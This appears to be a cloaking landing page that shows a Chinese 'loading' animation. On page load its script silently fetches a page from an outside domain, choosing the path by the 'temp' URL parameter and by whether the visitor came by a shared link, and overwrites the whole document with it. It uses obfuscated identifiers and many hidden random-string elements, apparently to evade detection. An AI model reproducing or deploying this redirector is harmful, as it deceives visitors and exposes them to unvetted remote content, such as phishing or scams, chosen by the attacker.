<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xlQR314nc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xlQR314nc .hMMxAcaAN {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xlQR314nc .content {
            line-height: 50px;
            text-align: center
        }

        .xlQR314nc .img {
            width: 100%
        }

        .xlQR314nc .v62vCDIA {
            text-align: center
        }

        .xlQR314nc .v62vCDIA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xlQR314nc .v62vCDIA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xlQR314nc .v62vCDIA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xlQR314nc .v62vCDIA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xlQR314nc .v62vCDIA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xlQR314nc .v62vCDIA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xlQR314nc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function lyf3vpcSgPpO(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var loiqr = lyf3vpcSgPpO('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ loiqr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ loiqr +".html?a=share";
		}
		
        CeIE0V1Y=url+"#"+new Date().getTime();
        CeIE0V1Y && function() {
            $.get(CeIE0V1Y, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Sc0y4mmkZDHlA7egc5unXqWLMWlfTSLnba3rVAUwS3ced31OIeuQMt4</b>
<img  src='' style='display:none'>
<ul style='display:none' >qa1hfU6i6VQOzTdZln</ul>
<img  src='' style='display:none'>
<div style='display:none'>LIq6LIYFQdH3M6uzKtXnqsQs5UEhceFNY</div>
<li style='display:none' >nPKnALeom3RN11nyNh5qVXnfETnhfvWPl0t8XUBZDDEbQi8lMEwLiwj8ASqbavCxrgOZC2vz5rgF3</li>
<div style='display:none'>LIq6LIYFQdH3M6uzKtXnqsQs5UEhceFNY</div>
<ul style='display:none' >qa1hfU6i6VQOzTdZln</ul>
<ul style='display:none' >qa1hfU6i6VQOzTdZln</ul><div class="xlQR314nc">
    <div class="hMMxAcaAN">
        <div class="v62vCDIA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >XmeWW8m9qsE4BNJPCOZfROJyO5FUSLxOGEwJ8Ip7L1Gdgc3ZJmFhU4EGy9lLFLig3Uxmr4OZmT</h1>
<span style='display:none'>Mq8nUb9H6iwlOh2XtI1FGcRJw</span>
<div style='display:none'>qF6FidrtJVMlvQKPjYQpzZIIx</div>
<div style='display:none'>qF6FidrtJVMlvQKPjYQpzZIIx</div>
<h1 style='display:none' >XmeWW8m9qsE4BNJPCOZfROJyO5FUSLxOGEwJ8Ip7L1Gdgc3ZJmFhU4EGy9lLFLig3Uxmr4OZmT</h1>
<span style='display:none'>Mq8nUb9H6iwlOh2XtI1FGcRJw</span>
<h1 style='display:none' >XmeWW8m9qsE4BNJPCOZfROJyO5FUSLxOGEwJ8Ip7L1Gdgc3ZJmFhU4EGy9lLFLig3Uxmr4OZmT</h1>
<p  style='display:none'>EyFOYkcCS5Vs5HYY67GVba1icZl3nWCJTaRBhJM8aDxahRRTHfxhxN2mqBektqBoqRfOK0BdsObOkhLdFRzsXAG0B9cUXNMVSfAJ</p></body>
</html>